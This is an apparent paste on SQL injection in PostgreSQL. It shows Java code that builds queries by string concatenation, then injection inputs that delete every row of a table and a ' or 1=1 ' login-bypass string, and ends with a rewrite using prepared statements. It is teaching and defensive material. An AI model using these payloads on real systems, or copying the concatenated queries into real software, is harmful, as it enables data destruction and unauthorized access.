Untitled

a guest
Jul 29th, 2018
SQL injection on PostgreSQL
String insert = "insert into userdetail(username,id,sno) values('"+username+"','"+userid+"','"+no+"')";
Statement stmt = conn.createStatement();
stmt.executeUpdate(insert);

');DELETE FROM userdetail;

org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near "');"
Position: 1

','',');DELETE FROM userdetail;

17:36:46,828 INFO [STDOUT] org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near "''');"
Position: 38

foo', '42', '42'); delete from userdetail; --

insert into userdetail(username,id,sno) values('foo', '42', '42');
delete from userdetail;
-- ','21','21')

String sql = "SELECT count(*) FROM users WHERE username = '";
sql += username;
sql += "' AND password = '";
sql += pwd;
sql += "'";

' or 1=1 or '' = '

SELECT count(*) FROM users WHERE username = 'arthur'
AND password = '' or 1=1 or ''=''
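
The two concatenated statements above rewritten with bind parameters, as an added example that is not part of the original paste. The class and method names and the JDBC_URL environment variable are hypothetical, and id and sno are assumed to be text columns (use setInt for integer columns).

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

public class ParameterizedUserQueries {

    // Replacement for the concatenated INSERT: values travel as bind
    // parameters, so quotes, semicolons and "--" in them are stored as data.
    // Assumption: id and sno are text columns.
    static int insertUser(Connection conn, String username, String userid, String no)
            throws SQLException {
        String sql = "insert into userdetail(username,id,sno) values(?,?,?)";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, username);
            ps.setString(2, userid);
            ps.setString(3, no);
            return ps.executeUpdate();
        }
    }

    // Replacement for the concatenated login SELECT: the input
    // "' or 1=1 or '' = '" is compared literally against the password
    // column instead of being parsed as part of the WHERE clause.
    static boolean credentialsMatch(Connection conn, String username, String pwd)
            throws SQLException {
        String sql = "SELECT count(*) FROM users WHERE username = ? AND password = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, username);
            ps.setString(2, pwd);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next() && rs.getLong(1) == 1;
            }
        }
    }

    public static void main(String[] args) throws SQLException {
        // Assumption: JDBC_URL points at a test database that has the
        // userdetail and users tables from the paste.
        try (Connection conn = DriverManager.getConnection(System.getenv("JDBC_URL"))) {
            // The paste's own inputs, now handled as plain strings.
            insertUser(conn, "foo', '42', '42'); delete from userdetail; --", "21", "21");
            System.out.println(credentialsMatch(conn, "arthur", "' or 1=1 or '' = '"));
        }
    }
}
```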